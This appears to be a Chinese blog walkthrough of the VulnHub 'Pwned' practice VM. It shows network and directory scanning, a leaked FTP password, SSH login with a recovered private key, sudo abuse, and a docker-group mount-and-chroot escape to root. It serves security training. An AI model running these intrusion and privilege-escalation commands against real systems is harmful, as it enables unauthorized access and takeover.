vulnhub之Pwned的实践

VSole2023-04-03 09:41:52

今天实践的是vulnhub的Pwned镜像,

下载地址,https://download.vulnhub.com/pwned/Pwned.ova,

先是用workstation导入,点击编辑配置就直接崩溃了,

于是又用virtualbox导入,做地址扫描,

sudo netdiscover -r 192.168.0.0/24,有地址了,189就是,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.189,

有web服务,为了能正常用gobuster做目录扫描,需要先添加ip和域名的静态关系,

/etc/hosts

192.168.0.189      pwned

扫描,gobuster dir -u http://pwned -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,

浏览器访问,http://192.168.0.189/hidden_text,

继续浏览器访问http://192.168.0.189/pwned.vuln,

查看页面源码,

获取到ftp的用户名密码,ftpuser/B0ss_B!TcH,

登录ftp,

获取到note.txt和id_rsa两个文件,

从note.txt查看到用户名ariana,

给id_rsa权限chmod 600 id_rsa,

ssh到靶机,ssh ariana@192.168.0.189 -i id_rsa,

不是root,需要提权,


sudo -l查看到selena可以执行/home/messenger.sh,

查看/home/messenger.sh,

以selena执行/home/messenger.sh,

获取到新的shell,还不是root,需要继续提权,

账号在docker组里,查看系统里的docker镜像,

执行命令,docker run -v /:/mnt --rm -it privesc chroot /mnt sh,

这回拿到root权限了,


docker
本作品采用《CC 协议》,转载必须注明作者和本文链接
七个杀手级Docker命令
2023-12-22 15:19:58
Docker是一个容器化平台,通过操作系统级别的虚拟化技术,实现软件的打包和容器化运行。借助Docker,开发人员能够将应用程序以容器的形式进行部署,但在此之前需要构建Docker镜像。只要熟悉相关Docker命令,开发人员就能轻松完成所有这些步骤,从而实现应用程序的容器化部署。本文将根据使用场景对 Docker 命令进行分类介绍。1 构建 Docker 镜像构建 Docker 镜像需要使用 Do
当网络流量监控发现某台运行多个docker容器的主机主动连接到一个疑似挖矿矿池的地址时,需要快速响应和排查,以阻止进一步的损害。
我们将深入分析排查过程,还原入侵的步骤和手段,帮助读者了解应对挖矿程序入侵的实际应急操作。通过进程PID和USER查看进程信息,通过进程链定位到进程所在容器的进程PID。通过进程PID查找对应容器名称,容器名:metabase。使用docker top 查看容器中的进程信息,找到到容器内异常进程。据此,可初步判断,java应用被入侵,导致容器被植入挖矿木马。
Docker 容器入侵排查
2023-06-15 10:00:29
容器的运行环境是相对独立而纯粹,当容器遭受攻击时,急需对可疑的容器进行入侵排查以确认是否已失陷,并进一步进行应急处理和溯源分析找到攻击来源。在应急场景下,使用docker命令可以最大程度利用docker自身的特性,快速的获取相关信息而无需进入容器内部,帮助我们进行溯源分析和解决问题。查看当前运行的容器,创建时间、运行状态、端口映射。[root@ecs-t /]# docker psCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMESb06352ff26cc sagikazarmark/dvwa "/run.sh" About an hour ago Up About an hour 3306/tcp, 0.0.0.0:81->80/tcp dvwa
首先,对Docker架构以及基本安全特性进行介绍,分析了Docker面临的安全威胁。由于Docker拥有轻量化、高效率和易部署的特点,目前已被广泛应用于云计算和微服务架构中。本文对Docker安全相关的研究思路、方法和工具进行比较和分析,并指出未来可能的研究方向。此外,Iptables的限制范围有限,容器网络仍然容易受到数据链路层攻击,如ARP欺骗等。
Docker 向所有 Docker Hub 用户发去邮件,如果他们是以组织的名义创建账号,那么他们的账号将被删除,所有镜像也将一并删除,除非他们升级到一个付费的团队方案——其年费为 420 美元。
Sysdig公司的研究人员深入研究了这个问题,试图评估这个问题的严重性,报告发现的镜像使用了某种恶意代码或机制。遗憾的是,Docker Hub公共库的规模不允许其操作人员每天仔细检查所有上传的内容,因此许多恶意镜像并没有被报告。Sysdig还注意到,大多数威胁分子只上传几个恶意镜像,所以即使删除了有风险的镜像、封杀了上传者,也不会对这个平台的整体威胁状况有显著影响。
Sysdig的安全研究者近日发现Docker Hub中暗藏着超过1600个恶意镜像,可实施的攻击包括加密货币挖矿、嵌入后门/机密信息、DNS劫持和网站重定向等。问题持续恶化Sysdig表示,到2022年,从Docker Hub提取的所有镜像中有61%来自公共存储库,比2021年的统计数据增加了15%,因此用户面临的风险正在上升。
想学K8s,必须得先学会 Docker 吗?K8s 和 Docker 的关系Docker 和 K8s 这两个经常一起出现,两者的Logo 看着也有一定联系一个是背上驮着集装箱的鲸鱼一个是船的舵轮。红框里的容器运行时负责对接具体的容器实现Docker 公司也推出过自己的容器集群管理方案 Docker Swarm ,跟 K8s 算是竞品,但是在生产上几乎没人使用。
VSole
网络安全专家